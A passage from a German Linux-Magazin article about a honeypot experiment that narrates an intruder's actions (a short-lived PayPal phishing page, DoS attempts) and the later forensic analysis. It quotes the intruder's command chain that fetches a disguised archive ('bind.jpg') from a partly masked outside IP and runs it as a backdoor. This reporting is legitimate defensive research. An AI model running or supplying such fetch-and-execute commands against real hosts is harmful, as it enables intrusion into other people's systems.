Open Source im professionellen Einsatz

Newsletter abonnieren
Seite durchsuchen

HEFTARCHIV | NEWS | E-BIBLIOTHEK | VIDEO | BLOGS | WHITEPAPER | EVENTS | ACADEMY | ABO | SHOP

user friendly

  Home  »  Heft & Abo  »  Heftarchiv  »  2009  »  02  »  Ich sehe dich  

RSS-Feed der aktuellen News von Linux-Magazin Online Folgen Sie Linux-Magazin Online auf Twitter
Diesen Artikel druckenDiesen Artikel weiterempfehlen Diesen Artikel kommentieren Newsletter abonnieren
Share/Bookmark

Finale mit Hindernissen

Kurzzeitig sammelt der Angreifer Paypal-Benutzernamen und -Passwörter über eine Phishingseite ein (21.49 Uhr). Warum er sie nur kurzfristig aufsetzt, ist nicht nachvollziehbar. Der Einbrecher startet von dem übernommenen Honeypot aus weitere Angriffe im lokalen Netzwerk und in das Internet. Snort-Inline filtert Angriffe, für die bereits eine Signatur existiert. Der hier beschriebene Angreifer verwendet jedoch das reguläre HTTP-Protokoll, um weitere Rechner zu attackieren. Das ist schlecht zu verhindern, denn ein gesperrtes HTTP an der Honeywall hätte zur Folge, dass der Angreifer seine Werkzeuge nicht herunterladen kann. Auch ausgehende SSH-Verbindungen blockiert die Honeywall nicht, um dem Angreifer zu ermöglichen, auf den Honeypot zuzugreifen.

Allerdings unterbinden die Firewallregeln mit Hilfe eines Rate-Limits ausgehende Denial-of-Service-Angriffe. In der Standardkonfiguration erlaubt die Honeywall nur 15 ausgehende TCP- und 20 UDP-Verbindungen pro Tag. Somit schlägt der Versuch des Angreifers fehl, von dem gekaperten Honeypot aus den Server eines Webhosters in die Knie zu zwingen (2. Tag, 13.30 Uhr). Nachdem der Angreifer das festgestellt hat, scheint er einen Fehler in seiner UDP-Software zu vermuten, denn er lädt sie von einer anderen Quelle erneut herunter.

Um weitere Maschinen zu übernehmen, startet er auf ihnen die Kommandos »wget 208.25.xxx.xxx:443/bind.jpg«, »tar xzvf bind.jpg«, »chmod a+x httpd« und »./httpd« (3. Tag, 0.00 Uhr). Sie zielen auf die Installation einer mit den Rechten des Webservers laufenden Hintertür. In weniger als zwei Minuten hat der Angreifer sechs Rechner im Internet auf diese Weise übernommen. An dieser Stelle schalten die Autoren den Honeypot ab, um Schaden zu verhindern, und informieren alle betroffenen Administratoren.

Spuren analysieren

Für die Analyse nimmt der Admin die Honeypot-Rechner vom Netz und bindet deren kompromittierte Festplatten auf einem anderen Rechner ein. Dieser Schritt legt die Rootkits lahm, da die Systemprogramme der eingebundenen Festplatte nicht zum Einsatz kommen. Einige Vorsichtsmaßnahmen erhöhen noch den Wert der Analyse. Die von der Honeywall aufgezeichneten Logdaten, von wo der Angreifer welche Software auf das System lädt, sind nicht unbedingt vertrauenswürdig. Der Administrator sollte darum auch auf dem Honeypot selbst danach suchen. Außerdem versteckt sich zwar die Überwachungssoftware auf dem Honeypot vor dem Angreifer, aber falls er zum Beispiel den Netzwerkverkehr verschlüsselt, gehen Informationen verloren. Darum ist es nötig, die Aktivitäten des Angreifers zu verfolgen, um Gegenmaßnahmen zeitnah einzuleiten.

Auf dem kompromittierten Honeypot lassen sich Veränderungen am Dateisystem feststellen. Forensische Methoden [13] erlauben gelöschte Logdateien und Schadprogramme wiederherzustellen. Man erkennt damit, wie ein Angreifer seine Anwesenheit auf dem Rechner und die Veränderungen am Dateisystem zu verbergen sucht. Im beschriebenen Fall förderten die aufgespürten Logdateien des Schwachstellen-Scanners für Webanwendungen schließlich auch alle IP-Adressen zu Tage, die der Angreifer von dem Honeypot aus anvisiert hat.

Sie können diesen Artikel als PDF für 99 Cent kaufen. Klicken Sie dazu einfach auf eine der beiden Bezahloptionen Paypal oder ClickandBuy.


Diesen Artikel druckenDiesen Artikel weiterempfehlen Diesen Artikel kommentieren Newsletter abonnieren
Share/Bookmark
Ähnliche Artikel
Harmonische Sammlung Collax Security Gateway: Firewall mit vielen UTM-Funktionen
Frischer Wind Die Firewall-Appliances von Palo Alto Networks überwachen Applikationen
Voll im Blick Die Greenbone Vulnerability Assessment und Management Appliance im Test
LAMP mal ohne AMP Performante Webapplikationen in C++ entwickeln
Bunte Vielfalt Die Firewall Cyberoam authentifiziert Benutzer und überwacht das Messaging
Erweiterungsbau Mit NSE den Netzwerkscanner Nmap erweitern
Whitepaper
Open Source Datenintegration in der Praxis: Fallstudien und Anwendungsbeispiele (Folge 2)

Der zweite Teil des Open Source Datenintegration in der Praxis: Fallstudien und Anwendungsbeispiele White Papers beleuchtet anhand weiterer ausgewählter Case Studies die Implementierung von Open Source Datenintegration in der Praxis und benennt die daraus resultierenden Vorteile.

Download PDF (Registrierung erforderlich)
Usage Landscape Enterprise Open Source Data Integration

Die Nachfrage nach Datenintegrationslösungen für Unternehmen ist zunehmend gestiegen und vor allem das Interesse an Open Source Technologien wird immer größer. Doch wie und von wem werden Open Source Datenintegrationslösungen genutzt und welches Nutzungsverhalten lässt sich daraus ableiten? Das vorliegende White Paper präsentiert die Erfahrungswerte von über 1000 Open Source Nutzern und liefert fundierte Antworten auf diese Fragen.

Download PDF (Registrierung erforderlich)
Kommentare (0)